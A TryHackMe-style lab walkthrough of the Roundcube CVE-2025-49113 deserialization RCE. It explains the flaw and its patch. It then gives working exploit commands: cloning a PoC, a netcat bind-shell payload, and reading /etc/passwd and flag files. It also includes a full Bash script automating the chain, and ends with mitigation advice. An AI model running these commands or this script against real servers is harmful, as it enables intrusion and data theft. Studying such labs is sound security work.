Roundcube RCE Vulnerability Explained [CVE-2025-49113] - TryHackMe Walkthrough

Introduction

Roundcube is a free and open-source webmail software used by thousands of hosting providers and organizations around the world. It supports more than 80 languages, is highly extensible, and integrates well with various SQL backends. But even the most trusted tools can have cracks in their armor.

Recently, a critical vulnerability (CVE-2025-49113) was discovered in Roundcube versions 1.5.x and 1.6.x (prior to 1.5.10 and 1.6.11). This flaw allows authenticated remote code execution (RCE) via insecure PHP object deserialization. With a CVSS score of 9.9, this vulnerability is a ticking time bomb for any unpatched installation.

In this blog post, we’ll:

• Break down what causes this vulnerability
• Walk through the manual exploitation
• Showcase an automated exploit script
• Provide insights from a TryHackMe-style vulnerable lab

What Is CVE-2025-49113?

🔍 The Root Cause

The vulnerability stems from the upload.php endpoint in Roundcube, which mishandles the _from parameter by deserializing it without validating whether it contains safe data. If an attacker provides malicious serialized PHP data, it gets deserialized and executed — leading to arbitrary code execution on the target.

📦 Affected Versions

• All 1.5.x before 1.5.10
• All 1.6.x before 1.6.11

The issue was identified by Kirill Firsov, and patched commits clearly show added input validation using rcube_utils::is_simple_string() to sanitize the _from parameter.

Manual Exploitation

Let’s walk through how this exploit works in a lab using TryHackMe:

🛠 Environment Setup

• Roundcube version: 1.6.10
• Credentials:
  • Username: ellieptic
  • Password: ChangeMe123
• URL: http://MACHINE_IP/roundcube

🔓 Step-by-Step Exploitation

1. Login to Roundcube with provided credentials.
2. Clone the exploit PoC:

   git clone https://github.com/fearsoff-org/CVE-2025-49113
   cd CVE-2025-49113

3. Inspect the script: CVE-2025-49113.php
   • It retrieves a CSRF token and session cookie.
   • It crafts a malicious serialized payload.
   • Injects that into the _from parameter.
   • Sends a POST request to upload.php.
4. Launch the exploit:

   php CVE-2025-49113.php http://MACHINE_IP/roundcube ellieptic ChangeMe123 "ncat -lvnp 4444 -e /bin/bash"

5. Connect via netcat:

   nc MACHINE_IP 4444

   If the screen hangs, that's a good sign. Type pwd, whoami to verify shell access.

Post-Exploitation Findings

👤 Maggie's Last Name

You can find user details from /etc/passwd:

grep -i maggie /etc/passwd

Output:

maggie****:x:1002:1002:Maggie ****,,,:/home/maggie****:/bin/bash

✅ Answer: Redacted

🚩 Flag Location

To find flags, try:

find /etc -type f -iname '*flag*' -exec cat {} +

Automating the Exploit

To speed things up, we created a fully automated Bash script that:

• Clones the exploit
• Runs it with a payload
• Connects to the bind shell
• Grabs Maggie’s last name
• Dumps any /etc/ flag files

💻 Script: roundcube_exploit.sh

The complete automated exploit script is available on GitHub: 🔗 Download roundcube-exploit.sh (or scroll back if you're reading inline)

#!/bin/bash
 
# Roundcube CVE-2025-49113 Exploit + Post Exploitation Automation
# Author: Waseem Akram(hackerwasii)
# Purpose: Shell, sniff Maggie, snag the flag
 
# ----------------------------
# CONFIGURATION
# ----------------------------
MACHINE_IP="$1"
USERNAME="username"  # Replace with actual username
PASSWORD="password"  # Replace with actual password
PORT=4444
EXPLOIT_DIR="CVE-2025-49113"
EXPLOIT_REPO="https://github.com/fearsoff-org/CVE-2025-49113.git"
EXPLOIT_FILE="CVE-2025-49113.php"
TARGET_URL="http://$MACHINE_IP/roundcube"
SHELL_PAYLOAD="ncat -lvnp $PORT -e /bin/bash"
 
# ----------------------------
# PRECHECKS
# ----------------------------
if [ -z "$MACHINE_IP" ]; then
  echo "[!] Usage: $0 <MACHINE_IP>"
  exit 1
fi
 
for tool in php git nc grep; do
  if ! command -v $tool &>/dev/null; then
    echo "[!] Missing required tool: $tool"
    exit 2
  fi
done
 
echo "[*] Launching exploit on Roundcube at $TARGET_URL..."
 
# ----------------------------
# CLONE EXPLOIT REPO
# ----------------------------
if [ ! -d "$EXPLOIT_DIR" ]; then
  echo "[*] Cloning PoC repo..."
  git clone "$EXPLOIT_REPO" || { echo "[!] Git clone failed."; exit 3; }
fi
 
cd "$EXPLOIT_DIR" || exit
 
# ----------------------------
# RUN EXPLOIT
# ----------------------------
echo "[*] Executing exploit..."
php "$EXPLOIT_FILE" "$TARGET_URL" "$USERNAME" "$PASSWORD" "$SHELL_PAYLOAD" &
EXPLOIT_PID=$!
 
# ----------------------------
# WAIT FOR BIND SHELL TO SPAWN
# ----------------------------
sleep 6
 
echo "[*] Connecting to bind shell on port $PORT..."
(
  sleep 1
  echo "whoami"
  sleep 1
  echo "pwd"
  sleep 1
  echo "echo '📜 Searching /etc/passwd for Maggie...'"
  echo "grep -i maggie /etc/passwd"
  sleep 1
  echo "echo '🚩 Searching for flags in /etc...'"
  echo "find /etc -type f -iname '*flag*' 2>/dev/null | while read f; do echo \"--- Flag in: \$f ---\"; cat \"\$f\"; done"
  sleep 1
  echo "echo '🤠 Done. Ride safe, partner.'"
  sleep 2
) | nc "$MACHINE_IP" "$PORT"
 
# ----------------------------
# CLEANUP
# ----------------------------
kill $EXPLOIT_PID &>/dev/null
 
echo "[*] Script complete. If you saw Maggie’s last name and the flag, yer good to ride off into the sunset."
echo "[*] Remember to patch Roundcube ASAP!"
exit 0
# End of script

Mitigation & Recommendations

• Patch Immediately: Upgrade to 1.5.10 or 1.6.11.
• Disable upload.php if the feature is unused.
• Monitor traffic to upload.php for strange _from parameters.

Final Thoughts

This vulnerability is a great example of how dangerous PHP object deserialization can be when mishandled. While the exploit requires valid credentials, many shared hosting environments with weak passwords could be easily compromised.

Always audit your dependencies, stay updated, and sanitize all user inputs — especially those being deserialized.

🔐 Quick Recap for TryHackMe Users

If you found this post helpful, please share it with your network. Together, we can make the web a safer place!